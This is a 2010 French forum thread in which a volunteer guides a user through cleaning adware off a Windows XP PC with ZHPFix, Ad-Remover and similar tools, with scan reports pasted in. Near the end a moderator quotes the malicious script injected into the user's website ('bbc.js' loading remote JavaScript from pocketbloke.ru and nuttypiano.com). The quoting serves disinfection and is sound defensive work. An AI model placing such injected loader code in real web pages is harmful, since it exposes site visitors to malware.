Sujet Précédent Sujet Suivant

Mon site web était infecté...... et mon pc ?

GWEN -  
jacques.gache Messages postés 34829 Statut Contributeur sécurité -
Bonjour,
Après avoir désinfecté mon site web, je voudrais votre aide pour nettoyer totalement mon Pc qui est peut-être la source de l'infection de mon site web.

Après avoir respecté la procédure sur "https://www.commentcamarche.net/faq/2490-supprimer-les-adwares-publicites-intempestives-pop-up-etc", voici les 3 rapports qui semblerait nécessaire à celui qui veut bien m'aider:
___________________________________________________________
Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Version de la base de données: 4564

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

07/09/2010 21:43:32
mbam-log-2010-09-07 (21-43-32).txt

Type d'examen: Examen rapide
Elément(s) analysé(s): 157192
Temps écoulé: 9 minute(s), 4 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 1
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 1
Elément(s) de données du Registre infecté(s): 1
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 4

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
C:\Program Files\pdfforge Toolbar\FF\components\pdfforgeToolbarFF.dll (Adware.WidgiToolbar) -> Delete on reboot.

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs\C:\Program Files\pdfforge Toolbar\FF\components\pdfforgeToolbarFF.dll (Adware.WidgiToolbar) -> Quarantined and deleted successfully.

Elément(s) de données du Registre infecté(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
C:\Documents and Settings\Gwen\Local Settings\Application Data\xqbtdw_navps.dat (Adware.Navipromo.H) -> Quarantined and deleted successfully.
C:\Documents and Settings\Gwen\Local Settings\Application Data\xqbtdw_nav.dat (Adware.Navipromo.H) -> Quarantined and deleted successfully.
C:\Documents and Settings\Gwen\Local Settings\Application Data\xqbtdw.dat (Adware.Navipromo.H) -> Quarantined and deleted successfully.
C:\Program Files\pdfforge Toolbar\FF\components\pdfforgeToolbarFF.dll (Adware.WidgiToolbar) -> Quarantined and deleted successfully.

________________________________________________________________

KASPERSKY ONLINE SCANNER 7.0: scan report
Wednesday, September 8, 2010
Operating system: Microsoft Windows XP Home Edition Service Pack 3 (build 2600)
Kaspersky Online Scanner version: 7.0.26.13
Last database update: Tuesday, September 07, 2010 12:39:03
Records in database: 4202275
--------------------------------------------------------------------------------

Scan settings:
scan using the following database: extended
Scan archives: yes
Scan e-mail databases: yes

Scan area - My Computer:
C:\
D:\
E:\
Z:\

Scan statistics:
Objects scanned: 354878
Threats found: 1
Infected objects found: 2
Suspicious objects found: 0
Scan duration: 06:33:47

File name / Threat / Threats count
E:\System Volume Information\_restore{A086F1CC-3FBD-428D-8782-BF07C029DA93}\RP57\A0021928.exe Infected: Exploit.Win32.Umex.f 1
E:\System Volume Information\_restore{FE2C3B64-925A-4071-BAF4-26DA6A043BFC}\RP9\A0003740.exe Infected: Exploit.Win32.Umex.f 1

Selected area has been scanned.
_________________________________________________________________

Pour ZHP Diag: http://www.cijoint.fr/cjlink.php?file=cj201009/cijMHQ8CN8.txt
_________________________________________________________________



Voilà......j'espère que rien ne manque et qu'une personne généreuse me fera un petit signe!

Merci encore
A voir également:

13 réponses

Réponse 1 / 13
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
bonjour, ton rapport de zhpdiag à été fais avant le nettoyage de malwarebytes

zhpdiag = Run by Gwen at 07/09/2010 21:04:32
malwarebytes = 07/09/2010 21:43:32
et comme il a fais du nettoyage il serait bien d'en poster un nouveau zhpdiag pour contrôle
deplus ton malwarebytes ne mez semble pas à jour car chez moi j'ai la version 4573 et toi la 4564 ??

donc si tu peux faire cela , merci

Double cliques sur le raccourci ZHPDiag sur ton Bureau pour XP

Clique sur le Tournevis puis sur Tous pour cocher toutes les cases des options.

Cliques sur la loupe pour lancer l'analyse.

Laisses l'outil travailler, il peut être assez long.

A la fin de l'analyse,clique sur l'appareil photo et enregistre le rapport sur ton Bureau.

Fermes ZHPDiag en fin d'analyse.

Pour me le transmettre clique sur ce lien :

http://www.cijoint.fr/index.php

Clique sur Parcourir et cherche le fichier C:\Documents and settings\le_nom_de_ta_session\bureau\.ZHPDiag.txt

ou directement en choisissant bureau et ZHPDiag.txt clique dessus

Clique sur Ouvrir.

Clique sur "Cliquez ici pour déposer le fichier".

Un lien de cette forme :

http://www.cijoint.fr/cjlink.php?file=cj200905/cib7SU.txt

est ajouté dans la page.

Copie ce lien dans ta réponse.
1
Réponse 2 / 13
GWEN
 
Bonsoir Jacques.

Merci pour ta prompte réponse!!! :-)

J'upgrage Malwarebyte, je le fais tourner et j'enregistre le rap. à la fin, puis je m'occupe de ZHPDiag. Je m'y attelle et je t'envoie le tout.

Merci!
1
Réponse 3 / 13
GWEN
 
Salut Jacques, voici enfin les rapports:

ZHPDiag: http://www.cijoint.fr/cjlink.php?file=cj201009/cijCb0Iy2u.txt

Malwarebyte version 4573: http://www.cijoint.fr/cjlink.php?file=cj201009/cijpQzfSkC.txt
1
GWEN
 
Il est un peu tard.... Merci encore et à demain !
0
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
bonjour, tu fais ce qui suit , Merci

1) fixes les lignes donnés avec zhpfix

. Copie les lignes suivante en GRAS


[MD5.293E66AA529F0FBA1AA56340E293A389] - (.Spigot, Inc. - Application Updater.) -- C:\Program Files\Application Updater\ApplicationUpdater.exe [380928]
M1 - SPR:Search Page Redirection - C:\Program Files\Mozilla FireFox\extensions\pdfforge@mybrowserbar.com
M1 - SPR:Search Page Redirection - C:\Program Files\Mozilla FireFox\extensions\searchsettings@spigot.com
R3 - URLSearchHook: Microsoft Url Search Hook - {E312764E-7706-43F1-8DAB-FCDD2B1E416D} . (.Spigot, Inc. - Search Settings IE.) (1, 2, 3, 16) -- C:\Program Files\pdfforge Toolbar\SearchSettings.dll
O2 - BHO: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} . (.Spigot, Inc. - Widgi Toolbar for Internet Explorer.) -- C:\Program Files\pdfforge Toolbar\IE\1.1.2\pdfforgeToolbarIE.dll
O2 - BHO: (no name) - {E312764E-7706-43F1-8DAB-FCDD2B1E416D} . (.Spigot, Inc. - Search Settings IE.) -- C:\Program Files\pdfforge Toolbar\SearchSettings.dll
O3 - Toolbar: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} . (.Spigot, Inc. - Widgi Toolbar for Internet Explorer.) -- C:\Program Files\pdfforge Toolbar\IE\1.1.2\pdfforgeToolbarIE.dll
O4 - HKLM\..\Run: [SearchSettings] . (.Spigot, Inc. - Search Settings application.) -- C:\Program Files\pdfforge Toolbar\SearchSettings.exe
O23 - Service: Application Updater (Application Updater) . (.Spigot, Inc. - Application Updater.) - C:\Program Files\Application Updater\ApplicationUpdater.exe
O42 - Logiciel: pdfforge Toolbar v1.1.2 - (.Spigot, Inc..) [HKLM] -- {5791B7D3-8B34-4218-9750-6A8E45D0AD32}
[HKCU\Software\LanConfig]
[HKCU\Software\Search Settings]
[HKCU\Software\pdfforge]
[HKLM\Software\Application Updater]
[HKLM\Software\Search Settings]
[HKLM\Software\pdfforge]
O43 - CFD:Common File Directory ----D- C:\Program Files\Application Updater
O43 - CFD:Common File Directory ----D- C:\Program Files\pdfforge Toolbar
O61 - LFC:Last File Created 06/09/2010 - 07:55:33 ---A- C:\Documents And Settings\Gwen\Application Data\Search Settings\kb130\temp\ws-14858.log [0]
O61 - LFC:Last File Created 08/09/2010 - 20:03:43 ---A- C:\Documents And Settings\Gwen\Application Data\Search Settings\kb130\temp\ws-14860.log [796]
O64 - Services: CurCS - C:\Program Files\Application Updater\ApplicationUpdater.exe - Application Updater (Application Updater) .(.Spigot, Inc. - Application Updater.) - LEGACY_APPLICATION_UPDATER
SR - | Auto 08/01/2010 380928 | Application Updater (Application Updater) . (.Spigot, Inc..) - C:\Program Files\Application Updater\ApplicationUpdater.exe




. Lance ZHPFix de Nicolas Coolman qui se trouve sur ton bureau
. Pour XP, double-clique sur ZHPFix
. pour Vista et seven, faire un clic droit sur l'icône et exécute en tant qu'administrateur.
. Clique sur l'icone représentant la lettre H (« coller les lignes Helper »)

Dans l'encadré principal tu verras donc les lignes que tu as copié précédemment apparaitrent .

Vérifie que toutes les lignes que je t'ai demandé de copier (et seulement elles) sont dans la fenêtre.

. cliques sur OK
. Clique sur « Tous », puis sur « Nettoyer »
. Copie/colle la totalité du rapport dans ta prochaine réponse
tu le trouveras dans le dossier de zhpdiag dans program files sous le nom de ZHPFixReport


2) passes ad-remover en nettoyage


Déactives ton anti-virus et anti-spyware le temps du scan

Note : "Process.exe", une composante de l'outil, est détecté par certains antivirus (AntiVir, Dr.Web, Kaspersky Anti-Virus) comme étant un RiskTool.
Il ne s'agit pas d'un virus, mais d'un utilitaire destiné à mettre fin à des processus.
Mis entre de mauvaises mains, cet utilitaire pourrait arrêter des logiciels de sécurité (Antivirus, Firewall...) d'où l'alerte émise par ces antivirus.


Télécharge Ad-Remover sur ton bureau:
http://pagesperso-orange.fr/NosTools/C_XX/AD-R.exe
ou:
https://www.androidworld.fr/

/!\ Ferme toutes tes applications ouvertes. /!\

Double clique sur le fichier que tu viens de télécharger, à l'écran qui apparait, clique sur "Nettoyer".
Laisse travailler l'outil.
Poste le rapport qui s'affiche à l'écran quand l'analyse est terminée.



( Le rapport est sauvegardé sous C:\Ad-report-clean.log )
0
Réponse 4 / 13
GWEN
 
SALUT JACQUES? PARDON POUR LE RETARD!

(je re-poste car je ne suis pas sûre que ce soit passé!!!

ZHPFixReport:

Rapport de ZHPFix v1.12.3147 par Nicolas Coolman, Update du 07/09/2010
Fichier d'export Registre :
Run by Gwen at 09/09/2010 20:15:10
Web site : http://www.premiumorange.com/zeb-help-process/zhpfix.html
Contact : nicolascoolman@yahoo.fr

========== Processus mémoire ==========
C:\Program Files\Application Updater\ApplicationUpdater.exe [380928] => Supprimé et mis en quarantaine

========== Clé(s) du Registre ==========
O2 - BHO: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} . (.Spigot, Inc. - Widgi Toolbar for Internet Explorer.) -- C:\Program Files\pdfforge Toolbar\IE\1.1.2\pdfforgeToolbarIE.dll => Clé absente
O2 - BHO: (no name) - {E312764E-7706-43F1-8DAB-FCDD2B1E416D} . (.Spigot, Inc. - Search Settings IE.) -- C:\Program Files\pdfforge Toolbar\SearchSettings.dll => Clé absente
O23 - Service: Application Updater (Application Updater) . (.Spigot, Inc. - Application Updater.) - C:\Program Files\Application Updater\ApplicationUpdater.exe => Clé absente
HKCU\Software\LanConfig => Clé supprimée avec succès
HKCU\Software\Search Settings => Clé absente
HKCU\Software\pdfforge => Clé absente
HKLM\Software\Application Updater => Clé absente
HKLM\Software\Search Settings => Clé absente
HKLM\Software\pdfforge => Clé absente
O64 - Services: CurCS - C:\Program Files\Application Updater\ApplicationUpdater.exe - Application Updater (Application Updater) .(.Spigot, Inc. - Application Updater.) - LEGACY_APPLICATION_UPDATER => Clé absente

========== Valeur(s) du Registre ==========
R3 - URLSearchHook: Microsoft Url Search Hook - {E312764E-7706-43F1-8DAB-FCDD2B1E416D} . (.Spigot, Inc. - Search Settings IE.) (1, 2, 3, 16) -- C:\Program Files\pdfforge Toolbar\SearchSettings.dll => Valeur absente
O3 - Toolbar: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} . (.Spigot, Inc. - Widgi Toolbar for Internet Explorer.) -- C:\Program Files\pdfforge Toolbar\IE\1.1.2\pdfforgeToolbarIE.dll => Valeur absente
O4 - HKLM\..\Run: [SearchSettings] . (.Spigot, Inc. - Search Settings application.) -- C:\Program Files\pdfforge Toolbar\SearchSettings.exe => Valeur absente

========== Dossier(s) ==========
C:\Program Files\Application Updater => Dossier absent
C:\Program Files\pdfforge Toolbar => Dossier absent

========== Fichier(s) ==========
c:\program files\mozilla firefox\extensions\pdfforge@mybrowserbar.com => Supprimé et mis en quarantaine
c:\program files\mozilla firefox\extensions\searchsettings@spigot.com => Supprimé et mis en quarantaine
c:\program files\pdfforge toolbar\searchsettings.dll => Supprimé et mis en quarantaine
c:\program files\pdfforge toolbar\ie\1.1.2\pdfforgetoolbarie.dll => Supprimé et mis en quarantaine
c:\program files\pdfforge toolbar\searchsettings.exe => Supprimé et mis en quarantaine
c:\documents and settings\gwen\application data\search settings\kb130\temp\ws-14858.log => Supprimé et mis en quarantaine
c:\documents and settings\gwen\application data\search settings\kb130\temp\ws-14860.log => Supprimé et mis en quarantaine

========== Logiciel(s) ==========
O42 - Logiciel: pdfforge Toolbar v1.1.2 - (.Spigot, Inc..) [HKLM] -- {5791B7D3-8B34-4218-9750-6A8E45D0AD32} => Logiciel supprimé avec succès

========== Récapitulatif ==========
1 : Processus mémoire
10 : Clé(s) du Registre
3 : Valeur(s) du Registre
2 : Dossier(s)
7 : Fichier(s)
1 : Logiciel(s)

End of the scan

____________________________________________________________________________________________
__________________________________________________________________________________________

======= RAPPORT D'AD-REMOVER 2.0.0.1,E | UNIQUEMENT XP/VISTA/7 =======

Mis à jour par C_XX le 06/09/10 à 15:20
Contact: AdRemover.contact[AT]gmail.com
Site web: http://www.teamxscript.org

C:\Program Files\Ad-Remover\main.exe (SCAN [1]) -> Lancé à 21:06:30 le 09/09/2010, Mode normal

Microsoft Windows XP Édition familiale Service Pack 3 (X86)
Gwen@GWEN2 ( )

============== RECHERCHE ==============

0,Dossier trouvé: C:\Program Files\Mozilla FireFox\extensions\pdfforge@mybrowserbar.com
0,Dossier trouvé: C:\Program Files\Mozilla Firefox\extensions\searchsettings@spigot.com
0,Dossier trouvé: C:\Documents and Settings\SURF INTERNET\Application Data\pdfforge
0,Dossier trouvé: C:\Documents and Settings\SURF INTERNET\Application Data\Search Settings

============== SCAN ADDITIONNEL ==============

** Mozilla Firefox Version [3.6.8 (fr)] **

-- C:\Documents and Settings\Gwen\Application Data\Mozilla\FireFox\Profiles\yrwvo8wm.default\Prefs.js --
browser.download.dir, Z:\\FROM WEB
browser.startup.homepage, hxxp://www.sfr.fr
browser.startup.homepage_override.mstone, rv:1.9.2.8

-- C:\Documents and Settings\SURF INTERNET\Application Data\Mozilla\FireFox\Profiles\4vkas4y2.default\Prefs.js --
browser.download.dir, Z:\\FROM WEB
browser.startup.homepage, hxxp://www.sfr.fr
browser.startup.homepage_override.mstone, rv:1.9.2.8

========================================

** Internet Explorer Version [8.0.6001.18702] **

[HKCU\Software\Microsoft\Internet Explorer\Main]
Default_Page_URL: hxxp://partnerpage.google.com/smallbiz.dell.com/fr_fr?hl=fr&client=dell-row&channel=fr-smb&ibd=4080126
Do404Search: 0x01000000
Enable Browser Extensions: yes
Local Page: C:\WINDOWS\system32\blank.htm
Search bar: hxxp://www.google.com/hws/sb/dell-row/fr/side.html?channel=fr-smb
Search Page: hxxp://www.google.com/hws/sb/dell-row/fr/side.html?channel=fr-smb
Show_ToolBar: yes
Start Page: hxxp://www.club-internet.fr
Use Search Asst: no

[HKLM\Software\Microsoft\Internet Explorer\Main]
Default_Page_URL: hxxp://go.microsoft.com/fwlink/?LinkId=69157
Default_Search_URL: hxxp://go.microsoft.com/fwlink/?LinkId=54896
Delete_Temp_Files_On_Exit: yes
Local Page: C:\WINDOWS\system32\blank.htm
Search Page: hxxp://go.microsoft.com/fwlink/?LinkId=54896
Start Page: hxxp://go.microsoft.com/fwlink/?LinkId=69157

[HKLM\Software\Microsoft\Internet Explorer\ABOUTURLS]
Tabs: res://ieframe.dll/tabswelcome.htm
Blank: res://mshtml.dll/blank.htm

========================================

C:\Program Files\Ad-Remover\Quarantine: 0 Fichier(s)
C:\Program Files\Ad-Remover\Backup: 1 Fichier(s)

C:\Ad-Report-SCAN[1].txt - 09/09/2010 (776 Octet(s))

Fin à: 21:10:32, 09/09/2010

============== E.O.F ==============
1
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
ok tu vas faire un fixmbr avec zhpfix , et puis après un redémarrage me poster un nouveau zhpdiag pour contrôle , merci

. Copie la ligne suivante en GRAS


MBRFix



. Lance ZHPFix de Nicolas Coolman qui se trouve sur ton bureau
. Pour XP, double-clique sur ZHPFix
. pour Vista et seven, faire un clic droit sur l'icône et exécute en tant qu'administrateur.
. Clique sur l'icone représentant la lettre H (« coller les lignes Helper »)

Dans l'encadré principal tu verras donc les lignes que tu as copié précédemment apparaitrent .

Vérifie que toutes les lignes que je t'ai demandé de copier (et seulement elles) sont dans la fenêtre.

. cliques sur OK
. Clique sur « Tous », puis sur « Nettoyer »
. Copie/colle la totalité du rapport dans ta prochaine réponse
tu le trouveras dans le dossier de zhpdiag dans program files sous le nom de ZHPFixReport
0
bg62 Messages postés 26247 Date d'inscription   Statut Modérateur Dernière intervention   2 425
 
alors Gwen, pas eu le temps de t'inscrire sur CCM ... ça vaut un bon virus ça ...
@jacques.gache : merci pour ton suivi
@+
bg
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Réponse 5 / 13
GWEN
 
Bonsoir Jacques, voici le rapport MBR Fix:

apport de ZHPFix v1.12.3147 par Nicolas Coolman, Update du 07/09/2010
Fichier d'export Registre :
Run by Gwen at 10/09/2010 18:36:58
Web site : http://www.premiumorange.com/zeb-help-process/zhpfix.html
Contact : nicolascoolman@yahoo.fr

========== Master Boot Record ==========
Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.7 by Gmer, http://www.gmer.net

device: opened successfully
user: MBR read successfully
called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys atapi.sys hal.dll pciide.sys PCIIDEX.SYS
kernel: MBR read successfully
user & kernel MBR OK

Resultat après le fix :
Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.7 by Gmer, http://www.gmer.net

device: opened successfully
user: MBR read successfully
called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys atapi.sys hal.dll pciide.sys PCIIDEX.SYS
kernel: MBR read successfully
user & kernel MBR OK

========== Récapitulatif ==========
1 :Master Boot Record

End of the scan

J'espère que tout est bien!

Merci encore!
1
GWEN
 
POUR bg 62

Je me suis inscrit le lendemain. En fait, fallait repasser par la première page de CCM mais je ne l'avais pas vu.... :-(

@ plus
0
GWEN
 
Autres questions.....: que faut-il rajouter à Bitdefender, Spybot + Ad Aware pour avoir la meilleur protection possible?

Merrrrrrrrrrrci beaucoup!
0
bg62 Messages postés 26247 Date d'inscription   Statut Modérateur Dernière intervention   2 425
 
laisse faire ton helpeur, il va t'amener au bout :-)
0
Réponse 6 / 13
GWEN
 
Bien sûr ... je ne ferai rien sans lui. C'est vraiment sympa de leur part et de sa part de s'occuper de nous! J'en reviens toujours pas!
1
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
bonjour, peux tu poster un nouveau zhpdiag , merci

Double cliques sur le raccourci ZHPDiag sur ton Bureau pour XP sinon clique droit et en tant que administrateur !!

Clique sur le Tournevis puis sur Tous pour cocher toutes les cases des options.

Cliques sur la loupe pour lancer l'analyse.

Laisses l'outil travailler, il peut être assez long.

A la fin de l'analyse,clique sur l'appareil photo et enregistre le rapport sur ton Bureau.


Fermes ZHPDiag en fin d'analyse.


Pour me le transmettre clique sur ce lien :

http://www.cijoint.fr/index.php

Clique sur Parcourir et cherche le fichier C:\Documents and settings\le_nom_de_ta_session\bureau\.ZHPDiag.txt

ou directement en choisissant bureau et ZHPDiag.txt clique dessus

Clique sur Ouvrir.

Clique sur "Cliquez ici pour déposer le fichier".

Un lien de cette forme :

http://www.cijoint.fr/cjlink.php?file=cj200905/cib7SU.txt

est ajouté dans la page.

Copie ce lien dans ta réponse.
0
Réponse 7 / 13
GWEN
 
Bonjour Jacques,

Voici le fichier demandé:

http://www.cijoint.fr/cjlink.php?file=cj201009/cijAmwmpZM.txt

Merci.
1
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
bonjour, au vu du dernier rapport je dirais que c'est bon pour moi , mais tu vas passer list&kill"em, je pense qu'il va finir le nettoyage !! tu me dira comment tu sens topn pc et si plus de problèmes pour toi on finalisera cela !!


A) passes lis&kill"em option Search



DESACTIVE TON ANTIVIRUS ET TON PAREFEU SI PRESENTS !!!!!(car il est detecté a tort comme infection)

Télécharge List_Kill'em et enregistre le sur ton bureau

double clique ( clic droit "executer en tant qu'administrateur" pour Vista/7 ) sur le raccourci sur ton bureau pour lancer l'installation

une fois terminée , clic sur "terminer" et le programme se lancera seul

choisis l'option Search

un icone blanc et noir va s'afficher sur le bureau , il te servira à relancer le programme par la suite.
un autre rouge et noir te servira a desinstaller le prog a la fin de la desinfection.

laisse travailler l'outil

à l'apparition de la fenetre blanche , c'est un peu long , c'est normal , le programme n'est pas bloqué.

un rapport du nom de catchme apparait sur ton bureau , ignore-le,ne le poste pas , , il s'auto supprimera a la fin du scan

Poste le contenu du rapport qui s'ouvre aux 100 % du scan à l'ecran "COMPLETED"





B) list&kill"em option Clean



Relance List_Kill'em(soit en clic droit pour vista/7),avec le raccourci sur ton bureau.
mais cette fois-ci :

choisis l'Option Clean

ton PC va redemarrer,

laisse travailler l'outil.

en fin de scan la fenetre se ferme , et tu as un rapport du nom de Kill'em.txt sur ton bureau ,

colle le contenu dans ta reponse
0
GWEN
 
Bonjour,

Voici les liens pour les rapports de kill"em

http://www.cijoint.fr/cjlink.php?file=cj201009/cij361DonF.txt
et
http://www.cijoint.fr/cjlink.php?file=cj201009/cijAiODaep.txt

Si tout est bon, il faut que je désinfecte aussi mon site que j'ai rapatrié sur une clé USB.
Dois-je lancer un nouveau sujet?

Bien à toi et chapeau pour ton professionnalisme et la clarté de ton tutoriel!
0
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
bonjour, si plus de problème sur le pc supprimes les outils utiliser avec zhpfix, fais un nettoyage avec ccleaner , pour ton site on vois après avoir fini sur le pc !!

1) supprimes les outils utilisé

Pour Xp : Double-cliquez sur l'icône ZHPFix.exe sur votre Bureau.

Cliquez sur le A rouge (Nettoyeur de Tools).

Cliquez sur Nettoyer.

Faîtes redémarrer l'ordinateur pour terminer le nettoyage.

si zhpfix plus sur ton pc télécharges le:

https://www.zebulon.fr/telechargements/securite/systeme/zhpfix.html

https://www.zebulon.fr/telechargements/securite/systeme/zhpfix.html


2) fais un nettoyage avec ccleaner avec les réglages donnés


télécharges Ccleaner à partir de cette adresses

https://www.commentcamarche.net/telecharger/utilitaires/5647-ccleaner/


.enregistres le sur le bureau
.double-cliques sur le fichier pour lancer l'installation
.sur la fenêtre de l'installation langage bien choisir français et OK
.cliques sur suivant
.lis la licence et j'accepte
.cliques sur suivant
.la tu ne gardes de coché que mettre un raccourci sur le bureau et puis contrôler automatiquement les mises à jour de Ccleaner
.cliques sur intaller
.cliques sur fermer
.double-cliques sur l'icône de Ccleaner pour l'ouvrir
.une fois ouvert tu cliques sur option et puis avancé
.tu décoches effacer uniquement les fichiers, du dossier temp de windows plus vieux que 24 heures
.cliques sur nettoyeur
.cliques sur windows et dans la colonne avancé
.cochesla première case vieilles données du perfetch que celle-la
.cliques sur analyse une fois l'analyse terminé
.cliques sur lancer le nettoyage et sur la demande de confirmation OK il vas falloir que tu le refasses une autre fois une fois fini vériffis en appuiant de nouveau sur analyse pour être sur qu'il n'y est plus rien
.cliques maintenant sur registre et puis sur rechercher les erreurs
.laisses tout cochées et cliques sur réparrer les erreurs sélectionnées
.il te demande de sauvegarder OUI
.tu lui donnes un nom pour pouvoir la retrouver et enregistre
.cliques sur corriger toutes les erreurs sélectionnées et sur la demande de confirmation OK
.il supprime et fermer tu vériffis en relancant rechercher les erreurs
.tu retournes dans option et tu recoches la case effacer uniquement les fichiers, du dossier temp de windows plus vieux que 24 heures et sur nettoyeur, windows sous avancé tu décoches la première case vieilles données du perfetch
.tu peux fermer Ccleaner

pour aider si besion tutoriel: https://www.vulgarisation-informatique.com/nettoyer-windows-ccleaner.php




et puis on vois pour ton site après
0
GWEN
 
Ok, Jacques, tout est fait. Brillant la démonstration, la dextérité et le professionnalisme. Merci encore!
0
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
tu connect ta clé usb ou tu as mis ton site , tu ouvres malwarebytes qui normalement est toujour sur ton pc sinon télécharge le de nouveau

. Double cliques sur malwarebytesz pour l'ouvrir
. Dans l'onglet "mise à jour", cliques sur le bouton Recherche de mise à jour
. si le pare-feu demande l'autorisation de se connecter pour malwarebytes, acceptes
. Une fois la mise à jour terminée,
rend-toi dans l'onglet, Recherche
. Sélectionnes Exécuter un examen complet si il te demande de choisir les disque à analyser tu les sélectionnes tous surtout ta clé
. Cliques sur Rechercher
. Le scan démarre.
. A la fin de l'analyse, un message s'affiche : L'examen s'est terminé normalement. Cliquez sur 'Afficher les résultats' pour afficher tous les objets trouvés.
. Cliques sur Ok pour poursuivre.
. Si des malwares ont été détectés, cliques sur Afficher les résultats
. Sélectionnes tout (ou laisses cochés) et cliques sur Supprimer la sélection Malwarebytes va détruire les fichiers et clés de registre et en mettre une copie dans la quarantaine.
. Malwarebytes va ouvrir le bloc-notes et y copier le rapport d'analyse.
. redemarre le pc si il le fait pas lui même
. une fois redémarré double-cliques sur malwarebytes
. rends toi dans l'onglet rapport/log
. tu cliques dessus pour l'afficher une fois affiché
. tu cliques sur edition en haut du boc notes,et puis sur sélectionner tous
. tu recliques sur edition et puis sur copier et tu reviens sur le forum et dans ta réponse
. tu cliques droit dans le cadre de la reponse et coller
0
Réponse 8 / 13
bg62 Messages postés 26247 Date d'inscription   Statut Modérateur Dernière intervention   2 425
 
@jacques.gache
pour info, les infections détectées par google qui ont provoquées le blocage du site étaient : 
-- dans le fichier "bbc.js" un code est 'apparu' :

document.write('<sc'+'ript type="text/javascript" src="http:
//pocketbloke.ru/Telnet.js"></scri'+'pt>');


-- dans une foule d'autre fichiers, ça a commencé à mettre des trucs genre ceci:

<script type="text/javascript" src="http://nuttypiano.com/Te
lnet.js">


j'ai vérifié sur virustotal, bbc.js était noté infecté par nod32 ...
1
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
bg62 bonjour, si tu as une idée et solution pour désinfecter le site je suis preneur , car sur un pc ok je me débrouille !! lol !! , mais un site c'est une première !! donc pas de problème si tu as la possibilité de faire mieux que moi et cela ne va pas être difficile tu prends le relais et moi j'apprend !!!!
0
bg62 Messages postés 26247 Date d'inscription   Statut Modérateur Dernière intervention   2 425
 
re...
au niveau 'désinfection', non suis pas du tout à la hauteur ... :-)
là je n'ai fait que suivre les indications dans le compte 'google' et finir par trouver où ce(s) code(s) étaient venus s'installer pour pouvoir les supprimer manuellement ...
d'où cela vient-il ? aucune idée (je t'ai mis les indications pour te donner une idée de la "bête", mais ...)
et les outils de désinfection peuvent-ils les trouver, là grosse question ...
alors : à toi tu seras certainement bien plus efficace !
0
bg62 Messages postés 26247 Date d'inscription   Statut Modérateur Dernière intervention   2 425
 
re...
au niveau 'désinfection', non suis pas du tout à la hauteur ... :-)
là je n'ai fait que suivre les indications dans le compte 'google' et finir par trouver où ce(s) code(s) étaient venus s'installer pour pouvoir les supprimer manuellement ...
d'où cela vient-il ? aucune idée (je t'ai mis les indications pour te donner une idée de la "bête", mais ...)
et les outils de désinfection peuvent-ils les trouver, là grosse question ...
alors : à toi tu seras certainement bien plus efficace !
0
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
GWEN bonjour, on va essayer de suivre la piste de bg62 tu va rechercher ce fichier bbc.js et puis on le fera analyser après

Lien de téléchargement : http://pagesperso-orange.fr/NosTools/C_XX/SEAF.exe

Miroir : https://www.androidworld.fr/


Double-clique sur le fichier SEAF.exe

et dans la fenêtre y Tapez le script demandé . bbc.js

cocher la case chercher également dans le registre


cliqué sur Lancer la recherche, un barre de progression va s'afficher. Cette recherche prend quelques minutes.



Un rapport va s'ouvrir avec les résultats de la recherche.

il faut Poster ce rapport par copier-coller en réponse dans le sujet

IL sera enregistré ici : C:\SEAFlog.txt
0
Réponse 9 / 13
GWEN
 
Bonjour Jacques, voici le rapport:

1. ========================= SEAF 1.0.0.7 - C_XX
2.
3. Commencé à: 14:42:31 le 15/09/2010
4.
5. Valeur(s) recherchée(s):
6.
7. bbc.js
8.
9. (!) --- Recherche registre
10.
11. ====== Fichier(s) (TC: Date de création, TM: Date de modification, DA, Dernier accès) ======
12.
13. "c:\Program Files\EasyPHP1-8\www\gites\sp\bbc.js" [ ----A---- | 15340 ]
14. TC: 06/09/2010,22:23:22 | TM: 06/09/2010,22:23:23 | DA: 14/09/2010,21:19:39
15.
16. =========================
17.
18. "c:\Program Files\EasyPHP1-8\www\gites\nl\bbc.js" [ ----A---- | 15340 ]
19. TC: 06/09/2010,22:20:11 | TM: 06/09/2010,22:20:12 | DA: 14/09/2010,21:19:56
20.
21. =========================
22.
23. "c:\Program Files\EasyPHP1-8\www\gites\it\bbc.js" [ ----A---- | 15340 ]
24. TC: 06/09/2010,22:16:39 | TM: 06/09/2010,22:16:39 | DA: 14/09/2010,21:20:16
25.
26. =========================
27.
28. "c:\Program Files\EasyPHP1-8\www\gites\fr\bbc.js" [ ----A---- | 15340 ]
29. TC: 06/09/2010,22:12:27 | TM: 06/09/2010,22:12:28 | DA: 14/09/2010,21:20:42
30.
31. =========================
32.
33. "c:\Program Files\EasyPHP1-8\www\gites\en\bbc.js" [ ----A---- | 15340 ]
